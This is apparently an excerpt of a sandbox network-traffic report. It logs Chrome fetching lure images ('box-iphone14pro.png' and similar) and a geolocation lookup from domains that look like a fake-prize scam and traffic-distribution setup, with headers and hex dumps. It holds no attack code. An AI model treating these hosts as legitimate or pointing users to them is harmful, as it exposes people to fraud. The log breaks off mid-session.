                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB6BB879C27
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#272024543/gid:0/gname:root/mode:33279/mtime:1653412324#581053000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:04.581053Z
                              Expires: Fri, 21 Feb 2025 07:09:39 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:39 UTC3312INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 3c 00 3c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 02 02 03 01 00 00 00 00 00 00 00 00 00 00 08 06 07 05 09 00 04 0a 01 ff c4 00 1c 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 05 04 06 07 02 01 00 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 89 79 28 67
                              Data Ascii: JFIFCC<<y(g
                              2024-02-22 07:09:39 UTC289INData Raw: 63 bc 20 6a 21 22 1e 66 ea c4 23 a9 3a 80 ab 5b 73 2a cf f5 28 5a fe 01 8a 1f ea 0b cc 90 c5 5d 26 dc 2d 23 fc 8d 88 f2 33 08 98 93 aa 33 eb cb 2d 2b 1d d2 6f 6f ee 1b 88 96 58 42 82 6f 61 fe a4 f2 3b a5 50 a9 65 b2 f1 5b 27 42 f9 03 63 ed b6 62 a1 43 95 ea 04 29 a9 8b 25 67 65 01 90 7f 23 b8 89 ba 5c d5 1a aa b9 57 c7 d4 93 ec 47 04 78 22 08 d2 a2 2d 09 6d 4b d4 a1 c6 f0 d3 9e ba bd 22 90 09 16 1c 0b f7 30 c4 cc ed 35 fd 4d a8 a1 63 90 48 3f 11 d2 95 d9 fa 94 a7 f3 c7 ab a7 04 ec 7e 3b 8c f9 82 ca 67 65 90 b4 9c 8c 03 cd bb 18 5f aa ca bc 88 ea f6 9a 9e a4 99 b1 60 f3 64 64 ee 41 b8 b4 2e 61 4a 3a 93 c8 84 3a b4 bc b3 ce 62 94 94 bc f2 fd 41 7b 8e 62 61 01 b7 94 91 c1 3f 06 3f 4c a6 df 97 af 14 20 fd 2b 4e 47 06 c6 e2 25 da 6c 87 13 6c 64 fc c4 ea 13 a1
                              Data Ascii: c j!"f#:[s*(Z]&-#33-+ooXBoa;Pe['BcbC)%ge#\WGx"-mK"05McH?~;ge_`ddA.aJ::bA{ba??L +NG%lld


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.449761185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:39 UTC749OUTGET /media/mainstream/all/ab/top_red.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:39 UTC783INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:39 GMT
                              Content-Type: image/png
                              Content-Length: 4560
                              Connection: close
                              ETag: "a660370feb6a1543c3c872a52f7bcfa7"
                              Last-Modified: Wed, 20 Sep 2023 15:23:22 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB6CA8B6348
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#276024555/gid:0/gname:root/mode:33279/mtime:1653412335#773078000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:15.773078Z
                              Expires: Fri, 21 Feb 2025 07:09:39 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:39 UTC3313INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 02 00 00 00 b8 08 03 00 00 00 3f b7 12 c5 00 00 01 f5 50 4c 54 45 00 00 00 fe fe fe 9e 18 16 ef ef f0 a0 17 15 fb fb fb a1 18 16 ba 1c 1a a0 18 16 a0 18 16 c5 1e 1b f5 f6 f6 b9 1c 1a 91 16 14 c2 1d 1a a1 18 16 f1 f2 f2 bb 1c 1a ae 1a 18 f8 f8 f8 e3 22 1f f8 f8 f8 99 17 15 f9 fa fa a0 18 16 89 15 13 fb fb fb c6 1e 1b 93 16 14 fc fc fc b8 1b 19 8d 15 13 d0 20 1d f4 f4 f5 c3 1d 1b a2 18 16 f9 f9 f9 fc fc fc c0 1d 1a fd fd fd 88 14 12 9f 18 16 ec ed ed 98 17 15 a3 18 16 a6 19 17 f1 f2 f2 ee ee ef 92 16 14 f0 f1 f1 fe fe fe fc fc fc b7 1c 19 c5 1e 1b df 22 1f ae 1a 18 e4 ca ca b4 96 96 de 7e 7c fc fc fc b0 b1 b1 b5 3f 3d 72 12 11 e1 ba ba c0 1d 1b ac 1a 18 ef f0 f1 d1 d3 d4 a2 19 16 b1 1b 19 e2 22 1f a7
                              Data Ascii: PNGIHDR?PLTE" "~|?=r"
                              2024-02-22 07:09:39 UTC1247INData Raw: 8e 84 3a 14 14 7e 63 40 28 88 16 5c 9b 7e aa a7 4e 5f 3f 73 8b 3f 4e 67 25 97 1c 90 82 61 6e 40 64 53 b3 b3 e0 a6 2c 14 d0 dd 38 74 08 09 66 8f 7e f5 94 e5 db 04 c5 1b 93 00 94 a1 e0 97 54 4f 92 02 3c d1 56 80 1d 02 57 10 11 0f 12 2a 9b 9b 05 03 17 11 bf c6 5f 09 91 44 42 10 f5 1e a9 5f 28 c8 03 b1 0b f4 27 01 d6 44 eb 4f 0a 9e ca 4c 81 c2 15 c4 74 d2 11 bb c4 67 81 48 82 e6 66 c1 7d 32 c0 e6 01 1d 86 03 ee 40 2b 95 3a fa 4f 5a 4e f8 ee 76 f0 ef 14 14 08 f4 46 d7 ce 9c 81 02 95 2b 40 d3 15 a1 4e 19 bf be 6f 78 0c 34 39 0b ce c3 00 53 a0 38 0a 80 da 5d 2a ed ed 3f 99 11 83 ef 13 20 0c 00 74 4a 96 3f 78 8e ab e0 a2 47 01 36 de 5c c1 0b 2e 92 1b 68 ee 72 78 54 95 35 a1 20 ac a8 b2 43 1d 0a 4e 1f 4b 35 06 ef 64 00 09 20 a2 0d 0a 0a 7e 42 27 cf 5e 3d e7 2a c0
                              Data Ascii: :~c@(\~N_?s?Ng%an@dS,8tf~TO<VW*_DB_('DOLtgHf}2@+:OZNvF+@Nox49S8]*? tJ?xG6\.hrxT5 CNK5d ~B'^=*


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.449760136.243.216.2354433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:39 UTC583OUTGET /ExtService.svc/getextparams HTTP/1.1
                              Host: jsontdsexit2.com
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Origin: https://y1uy13f.xuowltwo.live
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Referer: https://y1uy13f.xuowltwo.live/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:39 UTC213INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Thu, 22 Feb 2024 07:09:39 GMT
                              Content-Type: application/json; charset=utf-8
                              Content-Length: 646
                              Connection: close
                              Vary: Accept-Encoding
                              Access-Control-Allow-Origin: *
                              2024-02-22 07:09:39 UTC646INData Raw: 7b 22 63 63 22 3a 22 55 53 22 2c 22 63 6e 61 6d 65 73 22 3a 7b 22 64 65 22 3a 22 55 53 41 22 2c 22 65 6e 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 65 73 22 3a 22 45 73 74 61 64 6f 73 20 55 6e 69 64 6f 73 22 2c 22 66 72 22 3a 22 c3 89 74 61 74 73 20 55 6e 69 73 22 2c 22 6a 61 22 3a 22 e3 82 a2 e3 83 a1 e3 83 aa e3 82 ab 22 2c 22 70 74 2d 42 52 22 3a 22 45 55 41 22 2c 22 72 75 22 3a 22 d0 a1 d0 a8 d0 90 22 2c 22 7a 68 2d 43 4e 22 3a 22 e7 be 8e e5 9b bd 22 7d 2c 22 63 69 74 79 22 3a 7b 22 64 65 22 3a 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 22 65 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 65 73 22 3a 22 4e 75 65 76 61 20 59 6f 72 6b 22 2c 22 66 72 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6a 61 22 3a 22 e3 83 8b e3 83 a5 e3 83 bc e3
                              Data Ascii: {"cc":"US","cnames":{"de":"USA","en":"United States","es":"Estados Unidos","fr":"tats Unis","ja":"","pt-BR":"EUA","ru":"","zh-CN":""},"city":{"de":"New York City","en":"New York","es":"Nueva York","fr":"New York","ja":"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.449762185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:39 UTC744OUTGET /media/mainstream/all/ab/x1.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:39 UTC782INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:39 GMT
                              Content-Type: image/png
                              Content-Length: 593
                              Connection: close
                              ETag: "ee850988ed56cd6f2498cae7993a8753"
                              Last-Modified: Wed, 20 Sep 2023 15:23:22 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB6D8D9E04E
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#276024555/gid:0/gname:root/mode:33279/mtime:1653412336#881081000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:16.881081Z
                              Expires: Fri, 21 Feb 2025 07:09:39 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:39 UTC593INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 02 00 00 00 b8 08 03 00 00 00 3f b7 12 c5 00 00 00 5a 50 4c 54 45 00 00 00 22 1e 20 36 2e 30 36 34 36 40 3f 41 40 3f 41 41 40 42 22 1e 20 22 1e 20 22 1e 20 22 1e 20 41 40 42 22 1e 20 30 2d 2f 41 40 42 22 1e 20 41 40 42 22 1e 20 41 40 42 41 40 42 22 1e 20 41 40 42 41 40 42 22 1e 20 41 40 42 41 40 42 22 1e 20 22 1e 20 41 40 42 39 38 3a 81 71 50 c5 00 00 00 1b 74 52 4e 53 00 40 10 20 40 bf 80 80 e2 af bf 8f 70 30 ef cf 50 50 cf af 9f 60 9f 8f df 70 60 c2 d4 68 a2 00 00 01 8b 49 44 41 54 78 da ed d8 e1 5a a2 40 14 80 61 40 c0 32 d1 94 4d 2d d7 fb bf cd 75 77 9f a7 53 f1 07 a3 92 c1 f7 bd 83 f9 e6 cc 28 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 b8 26 cf f3 b2 2c 8b ec 26 e5 cb 5f eb e3 5f a7
                              Data Ascii: PNGIHDR?ZPLTE" 6.0646@?A@?AA@B" " " " A@B" 0-/A@B" A@B" A@BA@B" A@BA@B" A@BA@B" " A@B98:qPtRNS@ @p0PP`p`hIDATxZ@a@2M-uwS(&,&__


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.449764185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:39 UTC757OUTGET /media/mainstream/all/ab/box-iphone14pro.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC783INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/png
                              Content-Length: 4457
                              Connection: close
                              ETag: "e26ab4191e2b939c553ea223042be270"
                              Last-Modified: Wed, 20 Sep 2023 15:23:21 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB6E98B42A0
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1693134509#284024580/gid:0/gname:root/mode:33188/mtime:1667333084#863076000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-11-01T20:04:44.863076Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC3313INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 02 00 00 00 b9 08 03 00 00 00 f4 eb c1 60 00 00 02 fa 50 4c 54 45 00 00 00 41 40 40 29 28 27 16 15 15 3d 3c 3a 3b 39 38 5c 59 57 5a 56 54 51 4f 4d 05 05 04 6f 6d 6b 41 40 3f 0e 0c 08 09 08 05 40 3f 3e 25 25 24 3f 3d 3d 40 3f 3e 42 41 40 68 65 63 53 52 51 53 51 50 44 42 41 3d 3c 3b 72 6f 6e 21 1f 1f 6a 68 67 43 41 40 00 00 00 38 36 35 41 3e 3d 3b 39 37 51 4f 4d 3e 3c 3b 42 40 3f e8 de db 02 03 0c 01 02 08 45 43 42 56 54 52 02 04 10 2b 29 28 4a 48 46 3f 3d 3b 59 56 54 55 52 50 08 08 08 00 01 06 3d 3b 3a 4d 4b 4a 06 05 05 4f 4c 4b 27 25 25 25 23 23 29 27 27 1b 1a 1a 39 37 36 5a 57 55 0c 0b 0b 47 45 44 52 50 4e 14 13 13 16 15 16 e4 da d9 73 70 6d 5f 5c 5a 44 42 41 49 47 45 2d 2b 2a 03 03 02 54 51 4f e3
                              Data Ascii: PNGIHDR`PLTEA@@)('=<:;98\YWZVTQOMomkA@?@?>%%$?==@?>BA@hecSRQSQPDBA=<;ron!jhgCA@865A>=;97QOM><;B@?ECBVTR+)(JHF?=;YVTURP=;:MKJOLK'%%%##)''976ZWUGEDRPNspm_\ZDBAIGE-+*TQO
                              2024-02-22 07:09:40 UTC1144INData Raw: 0a 9c 1c 86 81 55 08 07 59 fa 08 2e 59 75 b0 0a 88 80 0a 7c c9 80 28 18 2b 1c d7 81 40 15 08 86 fe 2d 80 35 08 84 43 2a 42 70 f1 14 4d b9 a0 d7 7d 01 03 54 90 0d 94 75 10 04 00 80 f8 aa 09 81 09 ce af 89 81 83 7f 1a 84 26 10 e9 0c 5d 1f b1 b8 50 5b 03 cf c6 56 ab 6c 70 7c 1f 44 91 e7 8d a2 d8 86 04 b0 0a 61 d5 ff d2 01 6b 40 21 c1 e9 46 8d 4e d7 08 04 60 00 f9 2d 1b 60 0d 6e 3c a9 ad 10 05 6c 01 84 7d 33 f1 1f 01 b7 34 a3 a2 96 e0 6f bb 76 f0 9b 34 14 07 70 fc 1f 69 0b 34 5a e9 90 d2 95 52 b1 65 24 02 4d 9c 3a 9c 4b e3 88 8d 93 ab 25 2e 35 4b e3 50 8f 5e c6 c1 5d 0c 23 19 97 ee 68 34 7a d2 83 1a d0 9b ee ba 2b 7a da 01 b2 eb b2 2c bb f8 e3 f5 41 19 91 7a 7e 4b bf 09 e1 c0 a9 9f fc 5a 08 bf 07 06 ab 5a 11 2b 94 cb 68 0e 72 ac 62 e4 92 d1 e8 75 5a a0 50 1f
                              Data Ascii: UY.Yu|(+@-5C*BpM}Tu&]P[Vlp|Dak@!FN`-`n<l}34ov4pi4ZRe$M:K%.5KP^]#h4z+z,Az~KZZ+hrbuZP


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.449763185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:39 UTC750OUTGET /media/mainstream/all/ab/box_open.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/crhhigmk/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru&f=1&sid=t1~h22irzseq2ep0nacjbfxeqrw&fp=26mYBxD1qHiy%2F7cYRR%2FEMg%3D%3D
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC781INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/png
                              Content-Length: 2685
                              Connection: close
                              Content-Security-Policy: block-all-mixed-content
                              ETag: "99264bee31a1abde5d0035468e53bbfb"
                              Last-Modified: Mon, 20 Feb 2023 09:33:01 GMT
                              No-Gzip-Compression: true
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Request-Id: 17B61DB6EBB3ABA0
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1676843277#847577324/gid:0/gname:root/mode:33279/mtime:1653412322#933050000/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-05-24T17:12:02.93305Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC2685INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 02 00 00 00 b9 08 03 00 00 00 f4 eb c1 60 00 00 00 c0 50 4c 54 45 00 00 00 cc ce cf c8 ca cb c8 ca cb dc de de b3 b5 b6 e3 e5 e5 ce d0 d1 e4 e6 e6 c7 c9 ca c9 cb cc c9 cb cc cb cd ce bc be c0 83 84 86 94 95 98 9f a1 a4 83 84 86 9f a1 a4 83 84 86 c8 ca cb 9f a1 a4 c9 cb cc c8 ca cb cc ce cf 83 84 86 9f a1 a4 cc ce cf 83 84 86 9f a1 a4 97 99 9c 83 84 86 83 84 86 9f a1 a4 e5 e7 e7 e4 e6 e6 e1 e3 e3 c7 c9 cb da dc dc de e0 e0 cd cf d0 d5 d7 d7 d0 d3 d4 d7 d9 d9 dd df df b5 b8 ba ca cc cd c4 c6 c7 c1 c3 c4 d2 d4 d5 bd c0 c1 ba bd bf e9 eb eb 9f a1 a4 82 83 85 9b 9d a0 94 96 99 ed ef ef 97 99 9c 7b 7c 7e ab ad af a4 a7 a9 88 89 8b 8f 90 92 b4 0f 84 af 00 00 00 23 74 52 4e 53 00 50 ef 9f 40 0f 80 40 bf df
                              Data Ascii: PNGIHDR`PLTE{|~#tRNSP@@


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.449765185.155.184.554433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:39 UTC674OUTGET /media/mainstream/flag-icon/flags/1x1/us.svg HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://y1uy13f.xuowltwo.live/media/mainstream/flag-icon/css/flag-icon.css
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC788INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/svg+xml
                              Content-Length: 5519
                              Connection: close
                              ETag: "1067e4f544573a808db9cf39397e3b8e"
                              Last-Modified: Tue, 21 Nov 2023 12:30:16 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Vary: Origin
                              Vary: Accept-Encoding
                              X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
                              X-Amz-Request-Id: 17B61DB6F46FD72E
                              X-Content-Type-Options: nosniff
                              X-Xss-Protection: 1; mode=block
                              x-amz-meta-mc-attrs: atime:1695223447#163842801/gid:0/gname:root/mode:33279/mtime:1655387477#806640800/uid:0/uname:root
                              x-amz-meta-mm-source-mtime: 2022-06-16T13:51:17.8066408Z
                              Expires: Fri, 21 Feb 2025 07:09:40 GMT
                              Cache-Control: max-age=31536000
                              Accept-Ranges: bytes
                              2024-02-22 07:09:40 UTC3308INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 68 65 69 67 68 74 3d 22 35 31 32 22 20 77 69 64 74 68 3d 22 35 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 31 32 20 35 31 32 22 3e 0d 0a 20 20 3c 67 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 73 63 61 6c 65 28 33 2e 39 33 38 35 29 22 3e 0d 0a 20 20 20 20 3c 67 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 31 70 74 22 3e 0d 0a 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 30 68 32 34 37 76 31 30 48 30 7a 6d 30 20 32 30 68 32 34 37 76 31 30 48 30 7a 6d 30 20 32 30 68 32 34 37 76 31 30 48 30 7a 6d 30 20 32 30 68 32 34 37 76 31 30 48 30 7a 6d 30 20 32 30 68 32 34 37 76 31
                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" height="512" width="512" viewBox="0 0 512 512"> <g fill-rule="evenodd" transform="scale(3.9385)"> <g stroke-width="1pt"> <path d="M0 0h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v10H0zm0 20h247v1
                              2024-02-22 07:09:40 UTC2211INData Raw: 33 35 33 2d 31 2e 37 31 2d 32 2e 33 35 33 20 31 2e 37 31 2e 38 39 38 2d 32 2e 37 36 36 2d 32 2e 33 35 33 2d 31 2e 37 31 68 32 2e 39 30 39 7a 6d 31 36 2e 34 36 36 20 30 6c 2e 38 39 39 20 32 2e 37 36 37 68 32 2e 39 30 39 6c 2d 32 2e 33 35 33 20 31 2e 37 31 2e 38 39 39 20 32 2e 37 36 36 2d 32 2e 33 35 34 2d 31 2e 37 31 2d 32 2e 33 35 33 20 31 2e 37 31 2e 38 39 39 2d 32 2e 37 36 36 2d 32 2e 33 35 34 2d 31 2e 37 31 68 32 2e 39 31 7a 6d 31 36 2e 34 36 37 20 30 6c 2e 38 39 39 20 32 2e 37 36 37 68 32 2e 39 30 39 6c 2d 32 2e 33 35 33 20 31 2e 37 31 2e 38 39 39 20 32 2e 37 36 36 2d 32 2e 33 35 34 2d 31 2e 37 31 2d 32 2e 33 35 33 20 31 2e 37 31 2e 38 39 39 2d 32 2e 37 36 36 2d 32 2e 33 35 34 2d 31 2e 37 31 68 32 2e 39 31 7a 6d 31 36 2e 34 36 37 20 30 6c 2e 38 39 39
                              Data Ascii: 353-1.71-2.353 1.71.898-2.766-2.353-1.71h2.909zm16.466 0l.899 2.767h2.909l-2.353 1.71.899 2.766-2.354-1.71-2.353 1.71.899-2.766-2.354-1.71h2.91zm16.467 0l.899 2.767h2.909l-2.353 1.71.899 2.766-2.354-1.71-2.353 1.71.899-2.766-2.354-1.71h2.91zm16.467 0l.899


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.449767185.155.186.254433120C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-02-22 07:09:40 UTC384OUTGET /media/mainstream/all/ab/iphone14pro.png HTTP/1.1
                              Host: y1uy13f.xuowltwo.live
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-22 07:09:40 UTC783INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Thu, 22 Feb 2024 07:09:40 GMT
                              Content-Type: image/png
                              Content-Length: 37189
